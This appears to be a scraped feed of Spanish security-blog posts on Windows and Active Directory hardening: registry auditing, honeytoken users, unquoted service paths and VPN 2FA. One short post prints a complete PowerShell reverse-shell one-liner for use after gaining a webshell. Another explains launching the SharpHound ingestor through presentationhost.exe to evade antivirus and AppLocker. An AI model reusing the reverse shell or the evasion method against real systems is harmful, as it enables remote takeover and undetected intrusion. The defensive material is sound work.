En el siguiente chain, vamos a realizar una modificación de mayúsculas/minúsculas con varios criterios.

Los chains son muy sencillos y donde mejor explicado está es en la propia documentación. Por ejemplo...

AttributeDescription
No WordsProvides an empty string
Custom File...User-specified custom wordlist file
Custom String...User-specified custom string
English DictionaryEnglish dictionary taken from the Unix words file
Common Names
 Men1,000 most common mens' names in the US
 Women1,000 most common womens' names in the US
 Pets1,200 most common pets' names in the US
Other
 Slang & ExpletivesWordlist of US slang and expletives
 Months & SeasonsWordlist of months and seasons

Tiene opciones sencillas, como el típico de añadir años antes o después de la palabra, poner la primera letra en mayúsculas, c4mb1ar las letras a lo hacker, etc...



Una herramienta más que anidad con otras, puede que nos ayude a crear un diccionario personalizado interesante para nuestros fines.

Espero que os guste !!!




Auditar cambios en el registro sin herramientas de terceros

$
0
0
Estimados amigos de Inseguros.

En el post de hoy vamos a volver a machacar al público con una característica básica de seguridad de los sistemas Microsoft como es la monitorización del registro.

Todos los cambios de seguridad que solemos hacer por políticas o comandos suelen acabar en la base de datos de los Windows, el registro.




Hemos hablado mucho de este tema por artículos en el blog, incluso abrí una rama en mi github personal con algunas claves del registro que si o si deberías monitorizar.

Pero para qué hacer esto? imagina que configuras: 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest DWORD ‘UseLogonCredential’ value 1 

Esto qué hace? habilita en un controlador el tipo de autenticación Wdigest para que cuando ejecuten Mimikatz en un proceso de compromiso las claves estén en claro, no haga falta crackearlas. Los malos lo hacen así !!! tu configuras mecanismos de defensa y ellos los cambian!!!

Bien, la cuestión es que la gente piensa en cómo monitorizar las claves, y piensa en clientes, agentes, cómo las gestiono, como detecto esos cambios en mi SIEM. 

Por partes. Lo que vamos a ver en este artículo es como levantar un evento, una alerta, cada vez que alguien mire o cambie un valor de una clave del registro concreta. Nos aparecerá un log en el visor de eventos y listo. Otra cosa es cuando tengas ese evento, como transformarlo en un correo (hay mil artículos de como enviar correos con eventos) enviarlo a un SIEM, ELK o similar...

Entonces, al lío. Como cualquier elemento de auditoria en sistemas Microsoft, hay dos partes: decirle al sistema que vamos a auditar acceso y/o error en el registro; el segundo paso es identificar qué ramas del registro queremos auditar.***** esto es igual para TODO en Active Directory******

Allá vamos. Vamos al editor de políticas de grupo y creamos una política con esta información:



Ahora vamos a la rama del registro que queremos auditar y seteamos la configuración, es decir, que para TODOS, audite el uso de estos permisos.



Entonces, seguro que habéis pensado... esta política tiene sentido para el servidor en el que se configura, ya que hemos ido localmente al registro a indicarle la rama concreta. BIEN !!! si no lo has pensado... lo entiendes? xD

Para eso usamos la rama Registro de las GPO en las que nos permite realizar esto, indicar qué claves del registro y qué permisos tienen, así, podemos emplearlo para un grupo de servidores (Por OU o como quiera que apliques la directiva).



Bien, ya sabes como hacerlo. Pero en muchas ocasiones, cuando habla con alumnos de cursos y similar, me comentan que con estos artículos se aprende la teoría, la manera de hacerlo, pero no se termina de centrar.

Me refiero a bien, pero ahora como lo haces, cómo lo mantienes. Te voy a dar unos tips o consejos.

Lo suyo es que esto lo hagas en entornos de pruebas. No esto en concreto porque no tiene mayor relevancia, pero para otros casos quizás si. Lo importante es realizar una copia de seguridad. Es tan sencilla como botón derecho.



Ahora la cuestión es que para importar una GPO entre dominios, en el entorno de pruebas y producción, se hace con un pequeño hack. En el servidor destino creas la política, y le dices que importe la configuración de un backup. De esta manera se importa una GPO entre dominios.

Bien, más trucos... Como he dicho, tengo una lista de claves del registro que me gustan, pero puede que tu tengas la tuya. Hay una manera cutre de importar estas claves de manera automática, y no tener que hacer el proceso 2 ( entrar en el registro, establecer permiso) pero no se la digas a nadie xD

Localiza tu GPO en SYSVOL, en mi caso estaba aquí: \\miempresa.local\SYSVOL\miempresa.local\Policies\{5F23582A-A1BA-4D22-A34B-AB5B3C29307A}\Machine\Microsoft\Windows NT\SecEdit

El fichero es el mismo que teneis en mi github, para que solo copies y pegueis so vagos !!!

Como se aprecia, se identifica la rama del registro y la SACL


"USERS\.DEFAULT\Environment" ,0,"D:PAR(A;CI;KA;;;BA)(A;CIIO;KA;;;CO)(A;CI;KA;;;SY)(A;CI;KR;;;BU)(A;CI;KR;;;S-1-15-2-1)S:AR(AU;OICISA;CCDCLCSD;;;WD)"
"USERS\.DEFAULT\Software\Classes\Exefile\Shell\Runas\Command\IsolatedCommand" ,0,"D:PAR(A;CI;KA;;;BA)(A;CIIO;KA;;;CO)(A;CI;KA;;;SY)(A;CI;KR;;;BU)(A;CI;KR;;;S-1-15-2-1)S:AR(AU;OICISA;CCDCLCSD;;;WD)"
"USERS\.DEFAULT\Software\Classes\Mscfile\Shell\Open\Command" ,0,"D:PAR(A;CI;KA;;;BA)(A;CIIO;KA;;;CO)(A;CI;KA;;;SY)(A;CI;KR;;;BU)(A;CI;KR;;;S-1-15-2-1)S:AR(AU;OICISA;CCDCLCSD;;;WD)"
Si editamos este fichero y lo modificamos añadiendo tus claves de registro, podrás cargar más fácilmente tu lista.


Pero bueno, se nos olvida lo importante !!! Queremos ver cómo al hacer un cambio en la rama del registro nos aparece un evento...


Ahora con ese evento, puedes configurar en tu SIEM, gestor de eventos o aparato mágico una alerta que te información si es un comportamiento normal, o es un "kinomakino" tocando tu Windows xDDD.

Espero que te sirva de ayuda y sobre todo, gracias por leerme !!!

Detectar enumeración de usuarios en Active Directory mediante honeytoken: Anti BloodHound, Empire, etc

$
0
0
Estimados amigos de Inseguros !!!

En este artículo vamos a comentar algunas cositas de Blue Team o fortificación de sistemas Windows mediante honeypots.

En este blog hemos hablado mucho de honeypots de todo tipo, he dado charlas que podéis ver en video, en fin, que me gusta...

Bien, vamos al concepto. Hay muchas herramientas hoy en día que se usan para explotar fallos en el Directorio Activo. De las más conocidas está Empire y su módulo para reconocer usuarios o como pueda ser el ingestor de BloodHoud.


La idea es crearnos un usuarios "honeypot" en el directorio para que, si algún proceso accede a él, nos salte una alarma en la que nos haga sospechar e investigar quien está realizando esa operación de enumeración, que da como resultado un usuario.

Os pongo otro ejemplo en el mundo web por si sirve de concepto. Imagina una web como esta www.miempresa.com en la que no existe www.miempresa.com/rrhh/nominas.  Si por cualquier motivo detecto una petición a ese recurso, es alguien que está buscando por mi web ese directorio... es decir, está enumerando.  El concepto es el mismo pero llevado a Active Directory.

Para ello vamos a hacer lo mismo que hicimos el otro día para auditar los cambios del registro, pero está vez lo vamos a hacer sobre un usuario, el comodín.

Creamos un usuario con un nombre cantoso, que no usamos, por ejemplo uso cebo, de "gancho" y de mi pasión por el jamón illooooooo. Ahora accedemos a las opciones avanzadas de seguridad y configuramos la auditoría de acceso sobre este objeto, al final, es un objeto de Active Directory.

Con esto estamos creando un honeyUser, un usuario que si alguien pregunta por él, es porque está haciendo un trabajo masivo de enumeración...

Si todo ha ido bien, cualquier acceso a este fichero daría un evento...

Pero ojo, qué pasa cuando entras a usuarios y equipos de Active Directory o usas cualquier comando powershell? Get-ADUser -filter *

Aquí tendrías un falso positivo como una casa...

El trabajo del analista de eventos es recibir esta alerta, y tratar de discernir si es un usuario administrador haciendo trabajo de administrador, o es una herramienta intentando ejecutar su acometido.

Espero que te sirva de ayuda, ya no tanto para estas herramientas, sino en general como idea de las capacidades de detección mediante auditorías.

Si quieres aprender a detectar Empire por ejemplo podrás mirar en la monitorización de procesos, buscar codificación de Powershell, consultas de red y muchas más cosas, esto es solo una idea para cualquier enumeración.

Para la detección en entorno local forense me gusta este post. https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/

y para monitorización remota me gusta este: https://www.swelcher.com/blog/2018/3/29/detecting-powershell-empire

Gracias por leerme !!!

Process Monitor. Ver las ramas del registro que se crean al hacer settings en Windows.

$
0
0
Estimados amigos de Inseguros !!!

En el episodio de hoy vamos a dar un breve tip&tricks relacionado con el registro y Windows.

El otro día publiqué en las redes sociales una web muy interesante que vincula una GPO con la rama del registro que le corresponde.

En esta ocasión un pequeño truco. ¿Conoces Process Monitor? La herramienta de Sysinternals para monitorizar procesos del sistema?

Podemos ir abriendo servicios y viendo datos del resultado, procesos hijos, el pid, la operación, como siempre. Bien, podemos usar los filtros para indicar dos pequeños filtros.
Uno que el proceso sea MMC.exe, es decir, una consola ( el editor de GPO´s por ejemplo) y otro filtro en el que indicamos que la operación en RegSetValue.


Una vez que tenemos el filtro, abrimos nuestra editor de GPO´s y modificamos cualquier dato, por ejemplo, la longitud de contraseña... y antes de darle a CLICK para guardar la GPO, volvemos a Process Monitor, aplicamos el filtro, borramos la lista, y hacemos click en la GPO (para guardar).

De esta manera podemos ver con detalle la clave de registro que se ha modificado.

Espero que os sirva de ayuda en alguna ocasión.

Gracias por leerme !!!



T1034. Enumera y soluciona el problema de las comillas en servicios de Windows !!!

$
0
0
Estimados amigos de Inseguros !!!

En el episodio de hoy vamos a comentar una pequeña herramienta o truco para ayudarnos a fortificar y/o atacar nuestros sistemas Windows, como siempre, depende del rol que te toque.

Siguiendo el Framework MITRE, vamos a hablar de la técnica T1034, en concreto Path Interception. Empleada como mecanismo de persistencia, aprovecha una vulnerabilidad de concepto en los servicios Windows para ejecutar de manera controlada binarios.

El concepto es sencillo. En los sistemas Windows arrancamos servicios, y si en los nombres del ejecutable del servicio hay espacio y no se ha empleado las comillas, por ejemplo "c:\mi compañia\mi programa\programa.exe" el comportamiento es que el sistema intentará buscar programa.exe de la siguiente manera:


C:\archivos de programa*\empresa*\nombredeprograma*\programa.exe*
C:\programa.exe
C:\archivos de programa\programa.exe
C:\archivos de programa\empresa\programa.exe
C:\archivos de programa\empresa\nombredeprograma\programa.exe


Buscará primero el binario en cada uno de los sitios que he puesto asterisco.

Si conocemos esto, y podemos escribir en cualquier de esas ubicaciones, podemos colocar nuestra pieza de software, nuestro malware/stager/etc... y que se ejecute cada vez que se inicie el servicio (por ejemplo, cada vez que se inicie el sistema).

El concepto de Services Hijacking es muy viejo, pero el comentarlo es porque aún veo muchos entornos en los que esto no se cuida.

Lo interesante de esto es que podemos usar alguna de las herramientas que hay para enumerar, pero en este que os traigo, tenemos la posibilidad de no solo listar los servicios del Windows que tienen un ejecutable con espacios en los nombres y no tiene comillas !!!! y si queremos, nos modifica el servicio para incluir las comillas, es decir, para solucionarlo.



Como ves en las imágenes de la propia herramienta, el concepto es muy sencillo.

Espero que te sirva de ayuda tanto si vas a atacar, como si vas a proteger.

También, podríamos usar este dato en el SIEM, si trazamos la actividad con SYSMON, preguntando algo así como: si el papa es service.exe y el proceso no es: '\''.*' y algunas cosita más, podrás descubrirlos "in the wild" sin tener que ir al equipo a pasarle la tool...

Bueno, como siempre, dale el uso que quieras, gracias por leerme !!!



Tips & tricks: No permitir a usuarios no admin meter equipos al dominio

$
0
0
Estimados amigos de Inseguros !!!

Un tip defensivo muy rápido y algo viejuno, pero que no se suele usar.

Imagina un entorno Active Directory en que los equipos pertenecen a UO para controlar cierto comportamiento, como el firewall local o una política de comunicaciones IPSEC.

Qué pasa si doy de alta un equipo, siendo un usuario plano, y no meto ese equipo en la UO que recibe la GPO? Recuerda que un usuario por defecto, sin ser admin, puede meter 10 equipos al dominio...

Pues con este sencillo click, puedes configurar este comportamiento para evitarlo:
https://support.microsoft.com/en-us/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain

Espero que lo uses !!!

Gracias por leerme !!!


Tips & Tricks: levantar una consola powershell remota desde cmd

$
0
0
Estimados amigos de inseguros !!!

Si en algún momento de tu vida, por ejemplo, si consigues una webshell, o una shell con sqlmap y necesitas levantar una shell inversa powershell, este es tu código xD. Solo tienes que lanzarlo y poner un netcat en el equipo destino a la escucha...

Espero que te sirva !!!  gracias por leerme.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ip',puerto);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Gratis.Segundo Factor en el móvil con Google Auth. para SonicWall VPN

$
0
0
Estimados amigos de Inseguros !!!

En esta pequeña entrada os voy a comentar una pequeña ayuda que lo mismo te resulta interesante.

Si tienes un sistema Sonicwall con una Vpn, podar usar el Google Authenticator.

¿Pero qué es esto? Lo primero es repasar que es un segundo factor de autenticación. Es un algo que nos permite identificarnos de una manera distinta al usuario y contraseña.



¿Si te digo que son las claves del banco de toda la vida, o el SMS para operar en internet te suena más?

Lo más básico de un segundo factor es que el origen del mismo debe ser distinto del primer factor. Los factores suelen ser: algo que sabes, algo que tienes, algo que eres.

Algo que sabes, una contraseña estática... si pones dos contraseñas que sabes, no está aplicando un 2FA correctamente porque igual que puedo averiguar la primera clave, puedo averiguar la segunda.

Algo que tienes, un tarjeta de coordenadas... un sms, un OTP ( One Time Password) generado por un cacharro RSA...



Algo que eres, una huella... un lectura de iris, de voz, etc.

El asunto mucha veces es más sencillo de lo que parece. En este caso 5 minutos de Google y 10 de pruebas. Muchas veces no avanzamos con las soluciones en las organizaciones porque nosotros mismos nos ponemos barreras, nos creemos que será muy caro, muy complejo.

Es sorprendente la cantidad de cosas que podemos mejorar en nuestro dia a dia sin necesidad de grandes inversiones... Y releyendo esta frase, lo amplio a otros campos de la vida más allá de la seguridad xDDD

Entonces, el proceso es muy sencillo. Imagino que es igual en otros fabricantes, aunque en Sonic Wall es muy sencillo.

En el usuario del firewall, da igual LDAP o local, activar el check OTP. YA ESTA !!!

Con esto el servicio de VPN ya sabe que hay que obtener un OTP del cliente.

Ahora está en la parte del cliente, en tu móvil. Debes bajar la aplicación para Ios o Android.

El proceso es sencillo. La primera vez que lo vas a usar, entras en el portal VPN, como siempre, introduces usuario y contraseña y auto-mágicamente te saldrá un QR para que vincules tu móvil con tu cuenta, es decir, que tu Sonicwall sepa a donde tiene que enviar la solicitud de OTP y quien eres.

Una vez lo vinculas, ya puedes usarlo con el cliente Windows, Mac o lo que sea. No hay que estar constantemente registrando el código QR, esto se hace sólo para "parearlo".

Cada vez que introduzcas usuario y password para conectarte, te pedirá un OTP el móvil como este:


Con este sencillo proceso, podemos ofrecer a nuestros usuarios remotos una manera segura de conectarse a la VPN, incluso en aquellos casos en los que usamos integración con Active Directory y las contraseñas puede que no sean todo lo fuertes que creemos, ya sabes: miempresa.123$ o similares...

Una vez más agradeceros vuestro tiempo para la lectura.




Usar BloodHound Ingestor en entornos hard: Presentationhost.exe

$
0
0
Estimados amigos de Inseguros !!!

Seguro que conoces la herramienta BloodHound para enumeración de dominios. Llevamos años disfrutando de esta pedazo de herramienta que te muestra gráficamente "los pasos" a seguir para liquidarte un Active Directory... bueno entre comillas...

Como sabes, la herramienta se basa en una parte servidora y un cliente o "ingestor" que recopila los gráficos contra Active Directory para su posterior visionado. Bien...

La teoría siempre es buena, pero la práctica a veces se complica, por ejemplo, con un antivirus de nueva generación que me detecta el uso del "ingestor"tanto por exe, como por Powershell.

Gracias al proyecto del señor https://twitter.com/jpg1nc y su proyecto, nos pone en nuestras manos la solución. Usar Presentationhost.exe un lolbins del sistema que no "pasa" por el radar de applocker, antivirus y demás.

Presentationhost.exe es un binario del sistema que ejecuta aplicaciones XAML en el contexto del navegador pero bajo el proceso presentationhost, como decíamos, "inmume" a la detección a fecha de hoy...

El autor nos indica cómo podemos "llamar" a un binario compilado en C# que es el ingestor original, pero en lenguaje .net. De esta manera se pueden evitar restricciones de Powershell.

Entonces, teniendo el método desarrollado, podemos iniciar el proceso en nuestra máquina víctima:
presentationhost.exe path/to/sharphound.xbap


La llamada a la aplicación nos abrirá un internet explorer con la llamada al ingestor.





Imagina la cantidad de llamadas que podemos hacer usando este método. Mil gracias al desarrollador !!!

Aunque me gustaría, la idea no es mía y el artículo original pertenece a este tipo. Mi intención es solo divulgativa y a efectos personales de chuleta.
Viewing all 510 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>